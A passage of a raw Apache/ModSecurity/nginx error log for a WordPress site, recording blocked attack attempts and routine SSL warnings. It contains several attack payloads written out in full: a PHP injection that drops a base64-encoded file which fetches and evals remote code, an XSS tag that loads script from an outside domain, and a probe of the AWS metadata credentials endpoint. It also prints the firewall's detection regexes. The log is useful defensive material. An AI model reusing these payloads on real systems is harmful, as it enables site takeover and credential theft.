http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z8t87iS8HGtyTft5ydO_sgAAAAg"] [Fri Mar 07 23:30:53.864067 2025] [ssl:warn] [pid 1435:tid 139786028455808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 07 23:30:54.279230 2025] [ssl:warn] [pid 1438:tid 139786028455808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 08 03:49:18.911804 2025] [ssl:warn] [pid 23701:tid 139711928825728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 08 03:49:19.502439 2025] [ssl:warn] [pid 23702:tid 139711928825728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 08 03:49:20.574037 2025] [ssl:warn] [pid 23702:tid 139711928825728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 08 03:49:26.931088 2025] [ssl:warn] [pid 23702:tid 139711928825728] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 08 03:49:34.654023 2025] [ssl:warn] [pid 24177:tid 140557253597056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 08 03:49:34.869675 2025] [ssl:warn] [pid 24178:tid 140557253597056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 08 04:25:00.757167 2025] [authz_core:error] [pid 24303:tid 140556864796416] [client 159.65.18.197:37832] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/08 04:25:06 [error] 24168#24168: *182405 access forbidden by rule, client: 159.65.18.197, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Mar 08 15:33:38.732302 2025] [:error] [pid 24303:tid 140557054064384] [client 38.252.239.77:50036] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z8ypojHgVf3TLEz57KIMiwAAAMI"], referer: http://investigacionperu.com [Sat Mar 08 15:33:42.765620 2025] [:error] [pid 24303:tid 140557045671680] [client 38.252.239.77:50044] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z8yppjHgVf3TLEz57KIMjQAAAMM"], referer: http://investigacionperu.com [Sat Mar 08 15:33:44.361979 2025] [:error] [pid 24195:tid 140556948723456] [client 38.252.239.77:50048] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z8ypqH6BSAC6-h_2OS_KGwAAAIY"], referer: http://investigacionperu.com [Sat Mar 08 15:33:45.954938 2025] [:error] [pid 24195:tid 140557070849792] [client 38.252.239.77:50052] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z8ypqX6BSAC6-h_2OS_KHQAAAIA"], referer: http://investigacionperu.com [Sat Mar 08 15:33:47.521222 2025] [:error] [pid 24303:tid 140556797654784] [client 38.252.239.77:50056] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z8ypqzHgVf3TLEz57KIMjgAAANg"], referer: http://investigacionperu.com [Sat Mar 08 15:33:49.094315 2025] [:error] [pid 24195:tid 140556881581824] [client 38.252.239.77:50060] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z8yprX6BSAC6-h_2OS_KHwAAAI4"], referer: http://investigacionperu.com [Sat Mar 08 15:33:50.735940 2025] [:error] [pid 24303:tid 140557070849792] [client 38.252.239.77:50064] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z8yprjHgVf3TLEz57KIMkAAAAMA"], referer: http://investigacionperu.com [Sat Mar 08 15:33:52.373131 2025] [:error] [pid 24303:tid 140556940330752] [client 38.252.239.77:50068] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z8ypsDHgVf3TLEz57KIMkQAAAMc"], referer: http://investigacionperu.com [Sat Mar 08 16:04:55.595481 2025] [authz_core:error] [pid 24303:tid 140556806047488] [client 147.182.200.94:50502] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/08 16:05:00 [error] 24167#24167: *189556 access forbidden by rule, client: 147.182.200.94, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Mar 08 16:17:27.425158 2025] [autoindex:error] [pid 24194:tid 140556931938048] [client 64.227.143.222:50704] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 09 03:49:33.831999 2025] [ssl:warn] [pid 24740:tid 139754125428608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 09 03:49:34.145316 2025] [ssl:warn] [pid 24741:tid 139754125428608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 09 03:49:34.839131 2025] [ssl:warn] [pid 24741:tid 139754125428608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 09 03:49:39.357544 2025] [ssl:warn] [pid 24741:tid 139754125428608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 09 03:49:41.678566 2025] [ssl:warn] [pid 25174:tid 140360695986048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 09 03:49:41.964661 2025] [ssl:warn] [pid 25175:tid 140360695986048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 09 03:49:43.367630 2025] [ssl:warn] [pid 25175:tid 140360695986048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 09 17:18:20.221572 2025] [autoindex:error] [pid 26028:tid 140360361682688] [client 64.227.143.222:43934] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 09 19:04:15.740263 2025] [ssl:warn] [pid 25175:tid 140360695986048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/03/09 19:31:40 [error] 23079#23079: *206375 access forbidden by rule, client: 45.148.10.238, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/09 23:38:54 [error] 23079#23079: *208563 access forbidden by rule, client: 31.220.0.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/10 01:44:15 [error] 23079#23079: *210581 access forbidden by rule, client: 45.148.10.238, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Mar 10 02:22:53.762518 2025] [autoindex:error] [pid 23088:tid 140360319719168] [client 194.163.129.207:57576] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/ [Mon Mar 10 02:22:53.942766 2025] [autoindex:error] [pid 22997:tid 140360260970240] [client 194.163.129.207:57578] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/ [Mon Mar 10 02:22:56.929366 2025] [autoindex:error] [pid 22997:tid 140360513238784] [client 194.163.129.207:57588] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/ [Mon Mar 10 02:22:57.119529 2025] [autoindex:error] [pid 23088:tid 140360370075392] [client 194.163.129.207:57590] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/ [Mon Mar 10 02:23:05.680172 2025] [autoindex:error] [pid 23088:tid 140360311326464] [client 139.59.14.228:57608] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Mar 10 02:29:54.153392 2025] [:error] [pid 23088:tid 140360513238784] [client 179.43.191.19:57674] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Z86U8rIGyq_C1bh-th9iGQAAAMA"], referer: https://investigacionperu.com [Mon Mar 10 03:29:29.720534 2025] [ssl:warn] [pid 20617:tid 140315695552384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 10 03:29:30.039621 2025] [ssl:warn] [pid 20618:tid 140315695552384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 10 03:29:30.630578 2025] [ssl:warn] [pid 20618:tid 140315695552384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 10 03:29:34.554433 2025] [ssl:warn] [pid 20618:tid 140315695552384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 10 03:29:36.845514 2025] [ssl:warn] [pid 21051:tid 140112389146496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 10 03:29:37.138885 2025] [ssl:warn] [pid 21052:tid 140112389146496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 10 04:22:11.990350 2025] [:error] [pid 21517:tid 140112189613824] [client 38.252.239.77:59334] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z86vQ05s3stZftiM6zX31wAAAMI"], referer: http://investigacionperu.com [Mon Mar 10 04:22:14.841974 2025] [:error] [pid 21075:tid 140111949780736] [client 38.252.239.77:59342] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z86vRkLc9Mvpatm89I8yVQAAAFY"], referer: http://investigacionperu.com [Mon Mar 10 04:22:16.505391 2025] [:error] [pid 21517:tid 140111949780736] [client 38.252.239.77:59346] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z86vSE5s3stZftiM6zX32QAAANY"], referer: http://investigacionperu.com [Mon Mar 10 04:22:18.060780 2025] [:error] [pid 21076:tid 